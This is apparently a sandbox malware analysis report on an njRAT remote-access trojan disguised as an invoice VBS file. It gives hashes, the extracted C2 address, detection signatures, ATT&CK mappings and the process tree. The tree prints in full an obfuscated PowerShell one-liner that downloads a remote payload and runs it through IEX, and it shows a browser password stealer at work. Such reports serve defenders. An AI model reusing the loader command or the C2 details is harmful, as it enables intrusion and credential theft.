njrat | 410bfd3ac457f14f653b82ad2090dbdd24c5d689d4bb766f6c18e1c1ee8c171a

General

Target

Invoice#4110.vbs
Size

748B
MD5

f88564ad95f97097002bfa11a67d288f
SHA1

49d1056e48981200f7674432c0562163a8d65db5
SHA256

410bfd3ac457f14f653b82ad2090dbdd24c5d689d4bb766f6c18e1c1ee8c171a
SHA512

c7448569083d36592caec1360d59ebb5092970cd8d40268e280110fdcbaa7ddff324b71c055febf1e4dee0bd9315ee56c90cfff6b8fa46f72aec84e620099bc6

Score

10^/10

njrat boss spyware stealer suricata trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://transfer.sh/Bnlx/passsssssssssssssss_bypass.txt

Extracted

Family

njrat

Version

v4.0

Botnet

Boss

C2

103.147.184.73:7103

Mutex

Windows

Attributes

reg_key
Windows
splitter
|-F-|

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata

NirSoft WebBrowserPassView 4 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral1/memory/544-96-0x00000000045F0000-0x0000000004650000-memory.dmp	WebBrowserPassView
\Users\Admin\AppData\Local\Temp\SQL.exe	WebBrowserPassView
\Users\Admin\AppData\Local\Temp\SQL.exe	WebBrowserPassView
C:\Users\Admin\AppData\Local\Temp\SQL.exe	WebBrowserPassView

Nirsoft 4 IoCs

Processes:

resource	yara_rule
behavioral1/memory/544-96-0x00000000045F0000-0x0000000004650000-memory.dmp	Nirsoft
\Users\Admin\AppData\Local\Temp\SQL.exe	Nirsoft
\Users\Admin\AppData\Local\Temp\SQL.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\SQL.exe	Nirsoft

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

6 1392 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

SQL.exe

pid process

824 SQL.exe
Loads dropped DLL 2 IoCs

Processes:

aspnet_regbrowsers.exe

pid process

544 aspnet_regbrowsers.exe
544 aspnet_regbrowsers.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1392 set thread context of 544 1392 powershell.exe aspnet_regbrowsers.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exeSQL.exe

pid process

1392 powershell.exe
1392 powershell.exe
824 SQL.exe

flow	pid	process
6	1392	powershell.exe

pid	process
824	SQL.exe

pid	process
544	aspnet_regbrowsers.exe
544	aspnet_regbrowsers.exe

description	pid	process	target process
PID 1392 set thread context of 544	1392	powershell.exe	aspnet_regbrowsers.exe

pid	process
1392	powershell.exe
1392	powershell.exe
824	SQL.exe

Suspicious use of AdjustPrivilegeToken 28 IoCs

Processes:

powershell.exeaspnet_regbrowsers.exe

description	pid	process
Token: SeDebugPrivilege	1392	powershell.exe
Token: SeDebugPrivilege	544	aspnet_regbrowsers.exe
Token: 33	544	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	544	aspnet_regbrowsers.exe
Token: 33	544	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	544	aspnet_regbrowsers.exe
Token: 33	544	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	544	aspnet_regbrowsers.exe
Token: 33	544	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	544	aspnet_regbrowsers.exe
Token: 33	544	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	544	aspnet_regbrowsers.exe
Token: 33	544	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	544	aspnet_regbrowsers.exe
Token: 33	544	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	544	aspnet_regbrowsers.exe
Token: 33	544	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	544	aspnet_regbrowsers.exe
Token: 33	544	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	544	aspnet_regbrowsers.exe
Token: 33	544	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	544	aspnet_regbrowsers.exe
Token: 33	544	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	544	aspnet_regbrowsers.exe
Token: 33	544	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	544	aspnet_regbrowsers.exe
Token: 33	544	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	544	aspnet_regbrowsers.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

WScript.exepowershell.exeaspnet_regbrowsers.exe

description	pid	process	target process
PID 1072 wrote to memory of 1392	1072	WScript.exe	powershell.exe
PID 1072 wrote to memory of 1392	1072	WScript.exe	powershell.exe
PID 1072 wrote to memory of 1392	1072	WScript.exe	powershell.exe
PID 1392 wrote to memory of 544	1392	powershell.exe	aspnet_regbrowsers.exe
PID 1392 wrote to memory of 544	1392	powershell.exe	aspnet_regbrowsers.exe
PID 1392 wrote to memory of 544	1392	powershell.exe	aspnet_regbrowsers.exe
PID 1392 wrote to memory of 544	1392	powershell.exe	aspnet_regbrowsers.exe
PID 1392 wrote to memory of 544	1392	powershell.exe	aspnet_regbrowsers.exe
PID 1392 wrote to memory of 544	1392	powershell.exe	aspnet_regbrowsers.exe
PID 1392 wrote to memory of 544	1392	powershell.exe	aspnet_regbrowsers.exe
PID 1392 wrote to memory of 544	1392	powershell.exe	aspnet_regbrowsers.exe
PID 1392 wrote to memory of 544	1392	powershell.exe	aspnet_regbrowsers.exe
PID 544 wrote to memory of 824	544	aspnet_regbrowsers.exe	SQL.exe
PID 544 wrote to memory of 824	544	aspnet_regbrowsers.exe	SQL.exe
PID 544 wrote to memory of 824	544	aspnet_regbrowsers.exe	SQL.exe
PID 544 wrote to memory of 824	544	aspnet_regbrowsers.exe	SQL.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice#4110.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SZXDCFVGBHNJSDFGH = 'https://transfer.sh/Bnlx/passsssssssssssssss_bypass.txt';$EDRFGHNJMKDEFGHJ = 'nE----------------EbC++++++++++++++++T'.Replace('----------------','t.W').Replace('++++++++++++++++','lIEN');$SXDCFVGBHNJXDCFVGBHJK = 'DO*************aDST<<<<<<<<<>>>>>>>>>>>G'.Replace('*************','WnLo').Replace('<<<<<<<<<>>>>>>>>>>>','rIn');$SWXDECRFGYHUJISDFVGHJ ='I`EX(n`-------------`c`T $EDRFGHNJMKD<<<<<<<<<<<<<<>>>>>>>>>>>>>>GBHNJSDFGH)'.Replace('-------------','e`W`-Obj`E').Replace('<<<<<<<<<<<<<<>>>>>>>>>>>>>>','EFGHJ).$SXDCFVGBHNJXDCFVGBHJK($SZXDCFV');&('I'+'EX')($SWXDECRFGYHUJISDFVGHJ -Join '')|&('I'+'EX');
2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1392

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
3⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:544

C:\Users\Admin\AppData\Local\Temp\SQL.exe
C:\Users\Admin\AppData\Local\Temp\\SQL.exe /stext C:\Users\Admin\AppData\Local\Temp\FPS6TEMP10.txt
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:824

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

1

T1081

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\FPS6TEMP10.txt
MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Local\Temp\SQL.exe
MD5
a38281982740d4bcb1cb71d13508735b

SHA1
79caace31d17deb4f37c56cd8af4e3731be12324

SHA256
8ef45a1d9c797be035b17e09a7db9c07a1daf46112c910a4186ddd1048a2e222

SHA512
e615122344dddf825017f6e1123ce66419650adc2691d27f743d1f96ed81f325a2f5f23e5892384a76ff92412028940b413bec7c61454b980b1163eb7da4d2fb

Download Submit
\Users\Admin\AppData\Local\Temp\SQL.exe
MD5
a38281982740d4bcb1cb71d13508735b

SHA1
79caace31d17deb4f37c56cd8af4e3731be12324

SHA256
8ef45a1d9c797be035b17e09a7db9c07a1daf46112c910a4186ddd1048a2e222

SHA512
e615122344dddf825017f6e1123ce66419650adc2691d27f743d1f96ed81f325a2f5f23e5892384a76ff92412028940b413bec7c61454b980b1163eb7da4d2fb

Download Submit
\Users\Admin\AppData\Local\Temp\SQL.exe
MD5
a38281982740d4bcb1cb71d13508735b

SHA1
79caace31d17deb4f37c56cd8af4e3731be12324

SHA256
8ef45a1d9c797be035b17e09a7db9c07a1daf46112c910a4186ddd1048a2e222

SHA512
e615122344dddf825017f6e1123ce66419650adc2691d27f743d1f96ed81f325a2f5f23e5892384a76ff92412028940b413bec7c61454b980b1163eb7da4d2fb

Download Submit
memory/544-90-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/544-96-0x00000000045F0000-0x0000000004650000-memory.dmp

Filesize
384KB

Download
memory/544-95-0x0000000005420000-0x0000000005421000-memory.dmp

Filesize
4KB

Download
memory/544-94-0x0000000075411000-0x0000000075413000-memory.dmp

Filesize
8KB

Download
memory/544-92-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/544-91-0x000000000040836E-mapping.dmp

Download
memory/824-99-0x0000000000000000-mapping.dmp

Download
memory/1072-60-0x000007FEFBAB1000-0x000007FEFBAB3000-memory.dmp

Filesize
8KB

Download
memory/1392-67-0x000000001AB94000-0x000000001AB96000-memory.dmp

Filesize
8KB

Download
memory/1392-70-0x0000000002640000-0x0000000002641000-memory.dmp

Filesize
4KB

Download
memory/1392-88-0x000000001C5B0000-0x000000001C5B1000-memory.dmp

Filesize
4KB

Download
memory/1392-89-0x000000001B4C0000-0x000000001B4C3000-memory.dmp

Filesize
12KB

Download
memory/1392-85-0x0000000002720000-0x0000000002721000-memory.dmp

Filesize
4KB

Download
memory/1392-86-0x0000000002730000-0x0000000002731000-memory.dmp

Filesize
4KB

Download
memory/1392-73-0x000000001AB40000-0x000000001AB41000-memory.dmp

Filesize
4KB

Download
memory/1392-87-0x000000001AB9A000-0x000000001ABB9000-memory.dmp

Filesize
124KB

Download
memory/1392-69-0x000000001B780000-0x000000001B781000-memory.dmp

Filesize
4KB

Download
memory/1392-68-0x0000000002240000-0x0000000002241000-memory.dmp

Filesize
4KB

Download
memory/1392-66-0x000000001AB90000-0x000000001AB92000-memory.dmp

Filesize
8KB

Download
memory/1392-65-0x00000000022E0000-0x00000000022E1000-memory.dmp

Filesize
4KB

Download
memory/1392-64-0x000000001AC10000-0x000000001AC11000-memory.dmp

Filesize
4KB

Download
memory/1392-63-0x0000000002200000-0x0000000002201000-memory.dmp

Filesize
4KB

Download
memory/1392-61-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads